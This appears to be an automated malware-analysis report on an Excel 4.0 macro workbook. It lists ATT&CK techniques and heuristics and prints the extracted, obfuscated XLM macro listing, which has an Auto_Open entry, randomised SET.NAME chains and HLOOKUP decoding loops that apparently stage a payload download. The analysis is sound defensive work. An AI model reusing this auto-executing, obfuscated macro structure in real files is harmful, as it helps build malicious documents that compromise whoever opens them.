MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The file is an Excel 4.0 macro-enabled workbook containing an Auto_Open function, which is a known technique for executing malicious code upon opening. The critical heuristics indicate the presence of dangerous formula APIs within the Auto_Open macro, suggesting it's designed to download and execute a secondary payload. No specific family could be identified, but the execution method is clear.
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6722 bytes |
SHA-256: e797f215ab225d44065a3ab7ba382fca152d70731ba80d32d7c0cc424ba67b7e |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 16 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - vQjxihE
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!B157
' 0018 24 LABEL : Cell Value, String Constant - bbYKGWpXE len=0
' 0018 25 LABEL : Cell Value, String Constant - bEcxqkoMjT len=0
' 0018 23 LABEL : Cell Value, String Constant - FGsHxpCc len=0
' 0018 23 LABEL : Cell Value, String Constant - GzAShXbA len=0
' 0018 21 LABEL : Cell Value, String Constant - IKfvIy len=0
' 0018 20 LABEL : Cell Value, String Constant - mRymn len=0
' 0018 26 LABEL : Cell Value, String Constant - njwiFuzTxRH len=0
' 0018 21 LABEL : Cell Value, String Constant - nnkVxz len=0
' 0018 25 LABEL : Cell Value, String Constant - OPTeguzEYD len=0
' 0018 22 LABEL : Cell Value, String Constant - pyvqfIi len=0
' 0018 20 LABEL : Cell Value, String Constant - qqyGA len=0
' 0018 27 LABEL : Cell Value, String Constant - swFCxsXTGpCA len=0
' 0018 27 LABEL : Cell Value, String Constant - TVEcjCekYMVI len=0
' 0018 24 LABEL : Cell Value, String Constant - VXOjywRrf len=0
' 0018 26 LABEL : Cell Value, String Constant - waqNgHSQIBM len=0
' 0018 24 LABEL : Cell Value, String Constant - wDrgQJaKg len=0
' 0018 26 LABEL : Cell Value, String Constant - wxMoanYGELY len=0
' 0018 27 LABEL : Cell Value, String Constant - WXtFMYcqThTU len=0
' 0018 25 LABEL : Cell Value, String Constant - xzYdvDxNAN len=0
' 0018 20 LABEL : Cell Value, String Constant - yxSim len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' vQjxihE,T65,"",-263.00000000000000000000
' vQjxihE,T66,"",41.00000000000000000000
' vQjxihE,T67,"",-789.00000000000000000000
' vQjxihE,T68,"",-678.00000000000000000000
' vQjxihE,T69,"",-618.00000000000000000000
' vQjxihE,B70,"SET.NAME("swFCxsXTGpCA",0+VALUE("0"))",""
' vQjxihE,T70,"",865.00000000000000000000
' vQjxihE,B74,"SET.NAME("FGsHxpCc",swFCxsXTGpCA)",""
' vQjxihE,B76,"SET.NAME("bbYKGWpXE",swFCxsXTGpCA)",""
' vQjxihE,B80,"SET.NAME("bEcxqkoMjT",COUNTA(yxSim))",""
' vQjxihE,B84,"SET.NAME("njwiFuzTxRH",COUNTA(qqyGA))",""
' vQjxihE,B86,[],""
' vQjxihE,B90,"SET.NAME("mRymn","")",""
' vQjxihE,B92,"FGsHxpCc",""
' vQjxihE,B95,"SET.NAME("GzAShXbA",HLOOKUP("*",yxSim,FGsHxpCc,FALSE))",""
' vQjxihE,B97,"VXOjywRrf",""
' vQjxihE,B100,"SET.NAME("wxMoanYGELY",swFCxsXTGpCA)",""
' vQjxihE,B105,[],""
' vQjxihE,B109,"wxMoanYGELY",""
' vQjxihE,B113,"wDrgQJaKg",""
' vQjxihE,B115,"nnkVxz",""
' vQjxihE,B118,"TVEcjCekYMVI",""
' vQjxihE,B120,"SET.NAME("OPTeguzEYD",VALUE(HLOOKUP("*",qqyGA,TVEcjCekYMVI,FALSE)))",""
' vQjxihE,B125,"IKfvIy",""
' vQjxihE,B127,"mRymn",""
' vQjxihE,B129,"bbYKGWpXE",""
' vQjxihE,B134,NEXT(),""
' vQjxihE,B138,"xzYdvDxNAN",""
' vQjxihE,B143,[],""
' vQjxihE,B146,"pyvqfIi",""
' vQjxihE,B150,NEXT(),""
' vQjxihE,B152,RETURN(),""
' vQjxihE,B183,"SET.NAME("WXtFMYcqThTU",B70)",""
' vQjxihE,B188,"yxSim",""
' vQjxihE,B190,"SET.NAME("qqyGA",R91C12)",""
' vQjxihE,B195,"SET.NAME("pyvqfIi",201)",""
' vQjxihE,B197,"SET.NAME("waqNgHSQIBM",2)",""
' vQjxihE,B200,WXtFMYcqThTU(),""
' vQjxihE,B201,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.